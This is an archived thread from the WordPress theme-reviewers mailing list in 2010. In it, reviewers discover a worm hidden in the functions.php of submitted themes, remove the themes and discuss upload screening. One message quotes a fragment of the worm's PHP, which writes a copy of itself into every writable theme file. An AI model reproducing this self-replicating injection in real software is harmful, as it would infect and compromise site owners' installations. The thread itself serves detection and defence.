No subject


Tue Apr 20 23:23:57 UTC 2010


foreach ($direst as $item){
			if (is_writable($item)){

For every one it finds to be writable, it injects itself into the file
like this:
$cont=3Dfile_get_contents($item);
if (stripos($cont,$ftion) =3D=3D=3D false){
	$explar=3Dstripos( substr($cont,-20),"?".">") !=3D=3D false ? "" : "?".">"=
;
	$output .=3D $before . "Not found" . $after;
	if (stripos( substr($cont,-20),"?".">") !=3D=3D
false){$cont=3Dsubstr($cont,0,strripos($cont,"?".">") + 2);}
	$output=3Drtrim($output, "\n\t"); fputs($f=3Dfopen($item,"w+"),$cont .
$explar . "\n" .$widget);fclose($f);
	$output .=3D ($showdots && $ellipsis) ? "..." : "";
}

A lot of that is smokescreen, the line that counts is this one:
fputs($f=3Dfopen($item,"w+"),$cont . $explar . "\n" .$widget);fclose($f);		=
	=09

The fputs writes to the file. The $widget contains a copy of itself.

Everything else in there, all that SQL and crap: all smokescreen. None
of it does anything.

-Otto



On Fri, Sep 3, 2010 at 8:58 AM, Chip Bennett <chip at chipbennett.net> wrote:
> Can you and Chris put together some kind of lesson for the rest of us? So=
rt
> of a "watch out for this kind of thing" that we can learn from?
> (I found the second one before you got it pulled from SVN; so at least I =
can
> look at it in the meantime.)
> Chip
>
> On Fri, Sep 3, 2010 at 8:56 AM, Otto <otto at ottodestruct.com> wrote:
>>
>> Actually, I went ahead and removed them from SVN because we don't need
>> malware of that sort in there.
>>
>> But if you want a copy, I did save the bad functions.php file, just
>> for examination later. We may be able to detect this sort of thing in
>> the uploader and prevent it from uploading.
>>
>> -Otto
>>
>>
>>
>> On Fri, Sep 3, 2010 at 8:50 AM, Chip Bennett <chip at chipbennett.net> wrot=
e:
>> > I'll have to take a look at those tickets.
>> > Good learning opportunity for the reviewers? (Or an example of why
>> > security
>> > gurus are needed, for a security-review stage of the process?)
>> > Chip
>> >
>> > On Fri, Sep 3, 2010 at 8:45 AM, Otto <otto at ottodestruct.com> wrote:
>> >>
>> >> Never mind. I see it. It's in the functions.php file, disguised.
>> >> Clever.
>> >>
>> >> -Otto
>> >>
>> >>
>> >>
>> >> On Fri, Sep 3, 2010 at 8:42 AM, Otto <otto at ottodestruct.com> wrote:
>> >> > I'm looking at it now.. Where's the worm? Not finding it.
>> >> >
>> >> > -Otto
>> >> >
>> >> >
>> >> >
>> >> > On Fri, Sep 3, 2010 at 8:07 AM, Chris <chris at thematic4you.com> wrot=
e:
>> >> >> Tickets #870 and #873
>> >> >>
>> >> >>
>> >> >>
>> >> >> Von: theme-reviewers-bounces at lists.wordpress.org
>> >> >> [mailto:theme-reviewers-bounces at lists.wordpress.org] Im Auftrag vo=
n
>> >> >> Edward
>> >> >> Caissie
>> >> >> Gesendet: Freitag, 3. September 2010 14:47
>> >> >>
>> >> >> An: theme-reviewers at lists.wordpress.org
>> >> >> Betreff: Re: [theme-reviewers] Emergency Call
>> >> >>
>> >> >>
>> >> >>
>> >> >> SVN is a forever land ... without intervention by a "System Admin"
>> >> >> as
>> >> >> far as
>> >> >> I know.
>> >> >>
>> >> >> We can keep it out of Extend/Themes easy enough but beyond that we
>> >> >> do
>> >> >> not
>> >> >> have much control.
>> >> >>
>> >> >> What tickets/themes are you refering to?
>> >> >>
>> >> >>
>> >> >> Cais.
>> >> >>
>> >> >> On Fri, Sep 3, 2010 at 7:08 AM, Chris <chris at thematic4you.com>
>> >> >> wrote:
>> >> >>
>> >> >> Indeed .. infecting all installed themes of a blog.
>> >> >>
>> >> >>
>> >> >>
>> >> >> Von: theme-reviewers-bounces at lists.wordpress.org
>> >> >> [mailto:theme-reviewers-bounces at lists.wordpress.org] Im Auftrag vo=
n
>> >> >> Philip
>> >> >> M. Hofer (Frumph)
>> >> >> Gesendet: Freitag, 3. September 2010 13:00
>> >> >> An: theme-reviewers at lists.wordpress.org
>> >> >> Betreff: Re: [theme-reviewers] Emergency Call
>> >> >>
>> >> >>
>> >> >>
>> >> >> Oh fricken lovely.
>> >> >>
>> >> >> ----- Original Message -----
>> >> >>
>> >> >> From: Chris
>> >> >>
>> >> >> To: theme-reviewers at lists.wordpress.org
>> >> >>
>> >> >> Sent: Friday, September 03, 2010 3:55 AM
>> >> >>
>> >> >> Subject: [theme-reviewers] Emergency Call
>> >> >>
>> >> >>
>> >> >>
>> >> >> Hi,
>> >> >>
>> >> >>
>> >> >>
>> >> >> -=A0=A0=A0=A0=A0=A0=A0=A0=A0 who is able to remove / delete / nuke=
 two themes from the
>> >> >> SVN??
>> >> >>
>> >> >> -=A0=A0=A0=A0=A0=A0=A0=A0=A0 Who is in charge of the the scripts r=
unning right after
>> >> >> theme
>> >> >> upload??
>> >> >>
>> >> >>
>> >> >>
>> >> >> Had an encounter with not so clean themes .. the themes are
>> >> >> rejected,
>> >> >> but
>> >> >> need to be removed from the SVN as soon as possible.
>> >> >>
>> >> >>
>> >> >>
>> >> >> In addition I would like to see the upload script filtering for a
>> >> >> not
>> >> >> so
>> >> >> nice wormy gift.
>> >> >>
>> >> >>
>> >> >>
>> >> >> Thanks,
>> >> >>
>> >> >>
>> >> >>
>> >> >> Chris
>> >> >>
>> >> >>
>> >> >>
>> >> >>
>> >> >>
>> >> >>
>> >> >>
>> >> >> ________________________________
>> >> >>
>> >> >> _______________________________________________
>> >> >> theme-reviewers mailing list
>> >> >> theme-reviewers at lists.wordpress.org
>> >> >> http://lists.wordpress.org/mailman/listinfo/theme-reviewers
>> >> >>
>> >> >> _______________________________________________
>> >> >> theme-reviewers mailing list
>> >> >> theme-reviewers at lists.wordpress.org
>> >> >> http://lists.wordpress.org/mailman/listinfo/theme-reviewers
>> >> >>
>> >> >>
>> >> >>
>> >> >> _______________________________________________
>> >> >> theme-reviewers mailing list
>> >> >> theme-reviewers at lists.wordpress.org
>> >> >> http://lists.wordpress.org/mailman/listinfo/theme-reviewers
>> >> >>
>> >> >>
>> >> >
>> >> _______________________________________________
>> >> theme-reviewers mailing list
>> >> theme-reviewers at lists.wordpress.org
>> >> http://lists.wordpress.org/mailman/listinfo/theme-reviewers
>> >
>> >
>> > _______________________________________________
>> > theme-reviewers mailing list
>> > theme-reviewers at lists.wordpress.org
>> > http://lists.wordpress.org/mailman/listinfo/theme-reviewers
>> >
>> >
>> _______________________________________________
>> theme-reviewers mailing list
>> theme-reviewers at lists.wordpress.org
>> http://lists.wordpress.org/mailman/listinfo/theme-reviewers
>
>
> _______________________________________________
> theme-reviewers mailing list
> theme-reviewers at lists.wordpress.org
> http://lists.wordpress.org/mailman/listinfo/theme-reviewers
>
>


More information about the theme-reviewers mailing list